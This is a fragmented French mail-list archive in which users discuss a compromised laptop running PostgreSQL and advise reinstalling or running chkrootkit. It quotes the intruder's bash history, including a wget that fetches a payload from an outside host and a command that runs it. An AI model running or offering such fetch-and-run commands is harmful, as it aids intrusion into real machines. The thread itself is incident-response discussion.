Le 28/03/06, Free Mind[EMAIL PROTECTED] a écrit :
On 3/27/06, L. Boggio [EMAIL PROTECTED] wrote:
[...]
Bon, désolé, mais avec ces 2 lignes :
wget http://rooot.xhost.ro/fld.tgz
et
./x 200.68.192.253 53 0
On a la preuve qu'il a téléchargé un programme et qu'il l'a exécuté,
donc,
Le 28/03/06, Franck Dassonville[EMAIL PROTECTED] a écrit :
Le 28/03/06, [EMAIL PROTECTED] a écrit :
La **SEULE** solution sure est de réinstaller la machine (mais rien ne
t'empêche de jouer avec pour tenter de remonter la piste);
La sécurité, c'est être paranoïaque.
pas besoin
Franck Dassonville a écrit :
pas besoin d'aller jusque là tout de suite ..
apt-get install chkrootkit
puis
chkrootkit
devrait pouvoir rassurer ... ou confirmer le besion de réinstallation
Euh, pas faire confiance aveugle à chkrootkit...
j'ai eu des droleries avec ça...
--
Salut à tous !Curieux que je suis, je viens donc de tester chkrootkit sur ma machine et j'ai un port infecté avec ce message :Checking `bindshell'... INFECTED (PORTS: 4000)C'est grave docteur ? :)
Le 28/03/06, Pierre [EMAIL PROTECTED] a écrit :
Franck Dassonville a écrit : pas besoin d'aller
Le 28/03/06, florian fery-chamboissier[EMAIL PROTECTED] a écrit :
Salut à tous !
Curieux que je suis, je viens donc de tester chkrootkit sur ma machine et
j'ai un port infecté avec ce message :
Checking `bindshell'... INFECTED (PORTS: 4000)
C'est grave docteur ? :)
oui, t'es un vilain
arf c'était du temps ou j'étais jeune et fou ca ;)encore heureux que ca a changé depuis !Le 28/03/06, Patrice Karatchentzeff
[EMAIL PROTECTED] a écrit :Le 28/03/06, florian fery-chamboissier
[EMAIL PROTECTED] a écrit : Salut à tous ! Curieux que je suis, je viens donc de tester chkrootkit sur ma
Bonjour Groupe!J'ai cru découvrir quelque chose mais je n'en suis pas certain. Je crois que mon portable a été compromis.Mon portable est derrière un router SMC. Sur mon portable tourne aussi postgresql.
Lorsque j'ai entendu mes fans tourner plus que d'habitude, j'ai vérifié avec top... et le
J'ai vraiment la confirmation qu'un intrus est entré... J'ai postgresql 8.1 d'installé via apt-get seulement depuis hier... et hop, j'ai un .bash_history avec la liste des commandes et des fichiers qu'il a déposé dans /var/tmp/.mr004
Comment a-t-il fait pour entrer en console avec le user
Ma machine c'est mon portable perso qui me sert pour toutes sortes de tests. Je sais pour la dapper en production... mais j'aime bien avoir les dernières version des logiciels aussi.J'ai un router et pour le moment j'ai bloqué toutes les redirections de port qui menaient à ma machine et j'ai
Le 27/03/06, Free Mind a dit :
Ma machine c'est mon portable perso qui me sert pour toutes sortes de
tests. Je sais pour la dapper en production... mais j'aime bien avoir les
dernières version des logiciels aussi.
Bon, désolé, mais avec ces 2 lignes :
wget http://rooot.xhost.ro/fld.tgz
et
On 3/27/06, L. Boggio [EMAIL PROTECTED] wrote:
Le 27/03/06, Free Mind a dit : Ma machine c'est mon portable perso qui me sert pour toutes sortes de tests.Je sais pour la dapper en production... mais j'aime bien avoir les dernières version des logiciels aussi.
Bon, désolé, mais avec ces 2 lignes
11 matches
Mail list logo